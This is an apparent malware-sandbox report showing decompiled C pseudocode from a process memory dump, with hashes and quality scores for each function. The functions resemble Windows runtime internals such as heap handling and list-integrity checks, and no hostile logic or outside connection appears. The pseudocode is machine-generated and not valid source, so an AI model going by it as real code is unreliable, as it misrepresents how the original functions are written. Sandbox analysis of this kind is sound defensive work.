                                                                                                            				}
                                                                                                            				_t9 = _t73 + 0x10; // 0x10
                                                                                                            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                                                            				E010AF3E0(_t9, _v8, _t57);
                                                                                                            				_t41 =  *_t70;
                                                                                                            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                                                            					_t62 = 3;
                                                                                                            					asm("int 0x29");
                                                                                                            					_push(_t62);
                                                                                                            					_push(_t57);
                                                                                                            					_push(_t73);
                                                                                                            					_push(_t70);
                                                                                                            					_t71 = _t62;
                                                                                                            					_t74 = 0;
                                                                                                            					_v36 = 0;
                                                                                                            					_t63 = E0109A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                                                            					if(_t63 == 0) {
                                                                                                            						L20:
                                                                                                            						_t44 = 0x57;
                                                                                                            						return _t44;
                                                                                                            					}
                                                                                                            					_t45 = _v12;
                                                                                                            					_t58 = 0x1c;
                                                                                                            					if(_t45 < _t58) {
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					_t69 = _t45 / _t58;
                                                                                                            					if(_t69 == 0) {
                                                                                                            						L19:
                                                                                                            						return 0xe8;
                                                                                                            					}
                                                                                                            					_t59 = _v0;
                                                                                                            					do {
                                                                                                            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                                                            						 *_t59 = _t49;
                                                                                                            						if( *_t49 != 0x53445352) {
                                                                                                            							goto L18;
                                                                                                            						}
                                                                                                            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                                                            						return 0;
                                                                                                            						L18:
                                                                                                            						_t63 = _t63 + 0x1c;
                                                                                                            						_t74 = _t74 + 1;
                                                                                                            					} while (_t74 < _t69);
                                                                                                            					goto L19;
                                                                                                            				}
                                                                                                            				 *_t73 = _t41;
                                                                                                            				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                                                            				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                                                            				 *_t70 = _t73;
                                                                                                            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                                                            				return 0;
                                                                                                            			}


                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                            • Instruction ID: 8dc17e37ddb617a9569a3baa9e5aef1b8c626c1a818e9510691cfd06306d076f
                                                                                                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                            • Instruction Fuzzy Hash: 3C2165B5A00205EFDB61DF99C444E9AFBF8EB54354F14846EE9C59B210D770ED50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E01093B7A(void* __ecx) {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _t17;
                                                                                                            				intOrPtr _t26;
                                                                                                            				void* _t35;
                                                                                                            				void* _t38;
                                                                                                            				void* _t41;
                                                                                                            				intOrPtr _t44;
                                                                                                            
                                                                                                            				_t17 =  *0x11584c4; // 0x0
                                                                                                            				_v12 = 1;
                                                                                                            				_v8 =  *0x11584c0 * 0x4c;
                                                                                                            				_t41 = __ecx;
                                                                                                            				_t35 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x11584c0 * 0x4c);
                                                                                                            				if(_t35 == 0) {
                                                                                                            					_t44 = 0xc0000017;
                                                                                                            				} else {
                                                                                                            					_push( &_v8);
                                                                                                            					_push(_v8);
                                                                                                            					_push(_t35);
                                                                                                            					_push(4);
                                                                                                            					_push( &_v12);
                                                                                                            					_push(0x6b);
                                                                                                            					_t44 = E010AAA90();
                                                                                                            					_v20 = _t44;
                                                                                                            					if(_t44 >= 0) {
                                                                                                            						E010AFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x11584c0 * 0xc);
                                                                                                            						_t38 = _t35;
                                                                                                            						if(_t35 < _v8 + _t35) {
                                                                                                            							do {
                                                                                                            								asm("movsd");
                                                                                                            								asm("movsd");
                                                                                                            								asm("movsd");
                                                                                                            								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                                                            							} while (_t38 < _v8 + _t35);
                                                                                                            							_t44 = _v20;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t26 =  *0x11584c4; // 0x0
                                                                                                            					L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                                                            				}
                                                                                                            				return _t44;
                                                                                                            			}


                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b8a57986db838ec11250ab2407a2c10267efaaa968801cbaac712a2a5df4fe9b
                                                                                                            • Instruction ID: a1220fb7393a979840fc76f48cdf5b1b92190744ac274efa05a90b9112ca4728
                                                                                                            • Opcode Fuzzy Hash: b8a57986db838ec11250ab2407a2c10267efaaa968801cbaac712a2a5df4fe9b
                                                                                                            • Instruction Fuzzy Hash: 022192B2600609EFCB14DF98CD91BAABBBDFB44708F150068EA44AB251D771ED51DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E010E6CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                                                                            				char _v8;
                                                                                                            				char _v12;
                                                                                                            				char _v16;
                                                                                                            				char _v20;
                                                                                                            				char _v28;
                                                                                                            				char _v36;
                                                                                                            				char _v52;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				signed char* _t21;
                                                                                                            				void* _t24;
                                                                                                            				void* _t36;
                                                                                                            				void* _t38;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				_push(_t36);
                                                                                                            				_t46 = __edx;
                                                                                                            				_v12 = 0;
                                                                                                            				_v8 = 0;
                                                                                                            				_v20 = 0;
                                                                                                            				_v16 = 0;
                                                                                                            				if(E01087D50() == 0) {
                                                                                                            					_t21 = 0x7ffe0384;
                                                                                                            				} else {
                                                                                                            					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                            				}
                                                                                                            				if( *_t21 != 0) {
                                                                                                            					_t21 =  *[fs:0x30];
                                                                                                            					if((_t21[0x240] & 0x00000004) != 0) {
                                                                                                            						if(E01087D50() == 0) {
                                                                                                            							_t21 = 0x7ffe0385;
                                                                                                            						} else {
                                                                                                            							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                            						}
                                                                                                            						if(( *_t21 & 0x00000020) != 0) {
                                                                                                            							_t56 = _t46;
                                                                                                            							if(_t46 == 0) {
                                                                                                            								_t46 = 0x1045c80;
                                                                                                            							}
                                                                                                            							_push(_t46);
                                                                                                            							_push( &_v12);
                                                                                                            							_t24 = E0109F6E0(_t36, 0, _t46, _t56);
                                                                                                            							_push(_a4);
                                                                                                            							_t38 = _t24;
                                                                                                            							_push( &_v28);
                                                                                                            							_t21 = E0109F6E0(_t38, 0, _t46, _t56);
                                                                                                            							if(_t38 != 0) {
                                                                                                            								if(_t21 != 0) {
                                                                                                            									E010E7016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                                                                            									L01082400( &_v52);
                                                                                                            								}
                                                                                                            								_t21 = L01082400( &_v28);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t21;
                                                                                                            			}


                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d76ec4b3201678ba5d2e0aac5aa6c74bd823b0496ba4b8fb97868cd4d3edc53b
                                                                                                            • Instruction ID: dbf7ed28316954ed14e4a4edd3740413b884a36cf7c1878e1f9d9d446a8a4d06
                                                                                                            • Opcode Fuzzy Hash: d76ec4b3201678ba5d2e0aac5aa6c74bd823b0496ba4b8fb97868cd4d3edc53b
                                                                                                            • Instruction Fuzzy Hash: 0C2128728087499FD711FF2ED948B9BBBECAFA1240F440496FAC0C7251D732C548C6A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0113070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                                            				char _v8;
                                                                                                            				intOrPtr _v11;
                                                                                                            				signed int _v12;
                                                                                                            				intOrPtr _v15;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* __ebx;
                                                                                                            				char* _t32;
                                                                                                            				signed int* _t38;
                                                                                                            				signed int _t60;
                                                                                                            
                                                                                                            				_t38 = __ecx;
                                                                                                            				_v16 = __edx;
                                                                                                            				_t60 = E011307DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                                                            				if(_t60 != 0) {
                                                                                                            					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                                                            					_push( *_t7);
                                                                                                            					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                                                            					_push( *_t9);
                                                                                                            					_v12 = _a8 << 0xc;
                                                                                                            					_t11 = _t38 + 4; // 0x5de58b5b
                                                                                                            					_push(0x4000);
                                                                                                            					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                                                            					E0112AFDE( &_v8,  &_v12);
                                                                                                            					E01131293(_t38, _v28, _t60);
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t32 = 0x7ffe0380;
                                                                                                            					} else {
                                                                                                            						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                            					}
                                                                                                            					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                            						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                                                            						E011214FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return  ~_t60;
                                                                                                            			}


                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                            • Instruction ID: 27a1ea120698e923d064d39f21b9ee369da3d8fe68c42da2239099a1a7b7ce61
                                                                                                            • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                            • Instruction Fuzzy Hash: 27212636204600AFD71ADF5CC884FAABBE5EFD4350F048569F9958B389D730D919CB92
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E010E7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				intOrPtr _t21;
                                                                                                            				void* _t24;
                                                                                                            				intOrPtr _t25;
                                                                                                            				void* _t36;
                                                                                                            				short _t39;
                                                                                                            				signed char* _t42;
                                                                                                            				unsigned int _t46;
                                                                                                            				void* _t50;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t21 =  *0x1157b9c; // 0x0
                                                                                                            				_t46 = _a8;
                                                                                                            				_v12 = __edx;
                                                                                                            				_v8 = __ecx;
                                                                                                            				_t4 = _t46 + 0x2e; // 0x2e
                                                                                                            				_t36 = _t4;
                                                                                                            				_t24 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                                                                            				_t50 = _t24;
                                                                                                            				if(_t50 != 0) {
                                                                                                            					_t25 = _a4;
                                                                                                            					if(_t25 == 5) {
                                                                                                            						L3:
                                                                                                            						_t39 = 0x14b1;
                                                                                                            					} else {
                                                                                                            						_t39 = 0x14b0;
                                                                                                            						if(_t25 == 6) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					 *((short*)(_t50 + 6)) = _t39;
                                                                                                            					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                                                                            					_t11 = _t50 + 0x2c; // 0x2c
                                                                                                            					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                                                                            					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                                                                            					E010AF3E0(_t11, _a12, _t46);
                                                                                                            					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t42 = 0x7ffe0384;
                                                                                                            					} else {
                                                                                                            						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            					}
                                                                                                            					_push(_t50);
                                                                                                            					_t19 = _t36 - 0x20; // 0xe
                                                                                                            					_push(0x403);
                                                                                                            					_push( *_t42 & 0x000000ff);
                                                                                                            					E010A9AE0();
                                                                                                            					_t24 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                                                                            				}
                                                                                                            				return _t24;
                                                                                                            			}














                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c17cf222621180e654f22efc080372bf18b00d34edbba2be8cb205b9708cdc0e
                                                                                                            • Instruction ID: 85c9eb2d92a9154faafad57522797801309bd48ee44c78da2e5b93782cc64bce
                                                                                                            • Opcode Fuzzy Hash: c17cf222621180e654f22efc080372bf18b00d34edbba2be8cb205b9708cdc0e
                                                                                                            • Instruction Fuzzy Hash: 60219F72500604AFC725DF69D894EABBBE8EF58740F10456DE68AC7650D634E900CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 96%
                                                                                                            			E0108AE73(intOrPtr __ecx, void* __edx) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				void* _t19;
                                                                                                            				char* _t22;
                                                                                                            				signed char* _t24;
                                                                                                            				intOrPtr _t25;
                                                                                                            				intOrPtr _t27;
                                                                                                            				void* _t31;
                                                                                                            				intOrPtr _t36;
                                                                                                            				char* _t38;
                                                                                                            				signed char* _t42;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t31 = __edx;
                                                                                                            				_v8 = __ecx;
                                                                                                            				_t19 = E01087D50();
                                                                                                            				_t38 = 0x7ffe0384;
                                                                                                            				if(_t19 != 0) {
                                                                                                            					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            				} else {
                                                                                                            					_t22 = 0x7ffe0384;
                                                                                                            				}
                                                                                                            				_t42 = 0x7ffe0385;
                                                                                                            				if( *_t22 != 0) {
                                                                                                            					if(E01087D50() == 0) {
                                                                                                            						_t24 = 0x7ffe0385;
                                                                                                            					} else {
                                                                                                            						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                            					}
                                                                                                            					if(( *_t24 & 0x00000010) != 0) {
                                                                                                            						goto L17;
                                                                                                            					} else {
                                                                                                            						goto L3;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L3:
                                                                                                            					_t27 = E01087D50();
                                                                                                            					if(_t27 != 0) {
                                                                                                            						_t27 =  *[fs:0x30];
                                                                                                            						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                                                                                                            					}
                                                                                                            					if( *_t38 != 0) {
                                                                                                            						_t27 =  *[fs:0x30];
                                                                                                            						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						_t27 = E01087D50();
                                                                                                            						if(_t27 != 0) {
                                                                                                            							_t27 =  *[fs:0x30];
                                                                                                            							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                                                                                                            						}
                                                                                                            						if(( *_t42 & 0x00000020) != 0) {
                                                                                                            							L17:
                                                                                                            							_t25 = _v8;
                                                                                                            							_t36 = 0;
                                                                                                            							if(_t25 != 0) {
                                                                                                            								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                                                                                                            							}
                                                                                                            							_t27 = E010E7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                                                                                                            						}
                                                                                                            						goto L5;
                                                                                                            					} else {
                                                                                                            						L5:
                                                                                                            						return _t27;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}













                                                                                                            0x0108aebf
                                                                                                            0x0108aebf
                                                                                                            0x0108aeb3

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                            • Instruction ID: b9659e01770a39f41b25e47517eaa7050f907fb4412fc737c2ea28ee892e999c
                                                                                                            • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                            • Instruction Fuzzy Hash: 9F21D432705781DFE726AB29C944B657BE8EF44350F1904E1DDC48B692D734DC41C6A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E0109FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				void* _t19;
                                                                                                            				intOrPtr _t29;
                                                                                                            				intOrPtr _t32;
                                                                                                            				intOrPtr _t35;
                                                                                                            				intOrPtr _t37;
                                                                                                            				intOrPtr* _t40;
                                                                                                            
                                                                                                            				_t35 = __edx;
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t37 = 0;
                                                                                                            				_v8 = __edx;
                                                                                                            				_t29 = __ecx;
                                                                                                            				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                                                                                                            					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                                                                                                            					L3:
                                                                                                            					_t19 = _a4 - 4;
                                                                                                            					if(_t19 != 0) {
                                                                                                            						if(_t19 != 1) {
                                                                                                            							L7:
                                                                                                            							return _t37;
                                                                                                            						}
                                                                                                            						if(_t35 == 0) {
                                                                                                            							L11:
                                                                                                            							_t37 = 0xc000000d;
                                                                                                            							goto L7;
                                                                                                            						}
                                                                                                            						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                                                                            							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                                                                            							_t35 = _v8;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            					if(_t29 == 0) {
                                                                                                            						goto L11;
                                                                                                            					}
                                                                                                            					_t32 =  *_t40;
                                                                                                            					if(_t32 != 0) {
                                                                                                            						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                                                                            						E010776E2( *_t40);
                                                                                                            					}
                                                                                                            					 *_t40 = _t29;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_t40 = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                                                                            				if(_t40 == 0) {
                                                                                                            					_t37 = 0xc0000017;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				_t35 = _v8;
                                                                                                            				 *_t40 = 0;
                                                                                                            				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                                                            				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                                                                            				goto L3;
                                                                                                            			}











                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                            • Instruction ID: 46ca7ad8df85d231f5129efed72bb40d1bcd8a6c93f9474745c22b10c8308558
                                                                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                            • Instruction Fuzzy Hash: 2D217C72A05642DBDB31DF0DC650A66BBE6EB98B10F2485AEE996C7611D7309C00EB80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E0109B390(void* __ecx, intOrPtr _a4) {
                                                                                                            				signed int _v8;
                                                                                                            				signed char _t12;
                                                                                                            				signed int _t16;
                                                                                                            				signed int _t21;
                                                                                                            				void* _t28;
                                                                                                            				signed int _t30;
                                                                                                            				signed int _t36;
                                                                                                            				signed int _t41;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t41 = _a4 + 0xffffffb8;
                                                                                                            				E01082280(_t12, 0x1158608);
                                                                                                            				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                                                            				asm("sbb edi, edi");
                                                                                                            				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                                                            				_v8 = _t36;
                                                                                                            				asm("lock cmpxchg [ebx], ecx");
                                                                                                            				_t30 = 1;
                                                                                                            				if(1 != 1) {
                                                                                                            					while(1) {
                                                                                                            						_t21 = _t30 & 0x00000006;
                                                                                                            						_t16 = _t30;
                                                                                                            						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                                                            						asm("lock cmpxchg [edi], esi");
                                                                                                            						if(_t16 == _t30) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t30 = _t16;
                                                                                                            					}
                                                                                                            					_t36 = _v8;
                                                                                                            					if(_t21 == 2) {
                                                                                                            						_t16 = E010A00C2(0x1158608, 0, _t28);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				if(_t36 != 0) {
                                                                                                            					_t16 = L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                                                            				}
                                                                                                            				return _t16;
                                                                                                            			}












                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e0a518ca82c8391c713f1b55a30649a9cf30e84ec2964eabf0505630cd570758
                                                                                                            • Instruction ID: 34573a293ec79591643ccf3b1a57c69c615d5c001d191348fc33911e3055a840
                                                                                                            • Opcode Fuzzy Hash: e0a518ca82c8391c713f1b55a30649a9cf30e84ec2964eabf0505630cd570758
                                                                                                            • Instruction Fuzzy Hash: B0116B33305210DFCB19DA199E81A6F76A7EBC5330B24C179EDA6D7380CE319C02C694
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 77%
                                                                                                            			E01069240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				intOrPtr _t33;
                                                                                                            				intOrPtr _t37;
                                                                                                            				intOrPtr _t41;
                                                                                                            				intOrPtr* _t46;
                                                                                                            				void* _t48;
                                                                                                            				intOrPtr _t50;
                                                                                                            				intOrPtr* _t60;
                                                                                                            				void* _t61;
                                                                                                            				intOrPtr _t62;
                                                                                                            				intOrPtr _t65;
                                                                                                            				void* _t66;
                                                                                                            				void* _t68;
                                                                                                            
                                                                                                            				_push(0xc);
                                                                                                            				_push(0x113f708);
                                                                                                            				E010BD08C(__ebx, __edi, __esi);
                                                                                                            				_t65 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                                                            				if( *(__ecx + 0x24) != 0) {
                                                                                                            					_push( *(__ecx + 0x24));
                                                                                                            					E010A95D0();
                                                                                                            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                                                            				}
                                                                                                            				L6();
                                                                                                            				L6();
                                                                                                            				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                                                            				E010A95D0();
                                                                                                            				_t33 =  *0x11584c4; // 0x0
                                                                                                            				L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                                                            				_t37 =  *0x11584c4; // 0x0
                                                                                                            				L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                                                            				_t41 =  *0x11584c4; // 0x0
                                                                                                            				E01082280(L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x11586b4);
                                                                                                            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                                            				_t46 = _t65 + 0xe8;
                                                                                                            				_t62 =  *_t46;
                                                                                                            				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                                                            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                                                            					_t61 = 3;
                                                                                                            					asm("int 0x29");
                                                                                                            					_push(_t65);
                                                                                                            					_t66 = _t61;
                                                                                                            					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                                                            					_push( *_t23);
                                                                                                            					E010A95D0();
                                                                                                            					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                                                            					_push( *_t24);
                                                                                                            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                                                            					_t48 = E010A95D0();
                                                                                                            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                                                            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                                                            					return _t48;
                                                                                                            				} else {
                                                                                                            					 *_t60 = _t62;
                                                                                                            					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                                                            					 *(_t68 - 4) = 0xfffffffe;
                                                                                                            					E01069325();
                                                                                                            					_t50 =  *0x11584c4; // 0x0
                                                                                                            					return E010BD0D1(L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                                                            				}
                                                                                                            			}
















                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 57fa6b2b4b227c0f9f52c5519b8728d061ea05c8be2ef10b67d6af46104b6ee3
                                                                                                            • Instruction ID: 3b20626d6efba32f14534a4f215b42ca16194368085cc6057e30ca9f25311570
                                                                                                            • Opcode Fuzzy Hash: 57fa6b2b4b227c0f9f52c5519b8728d061ea05c8be2ef10b67d6af46104b6ee3
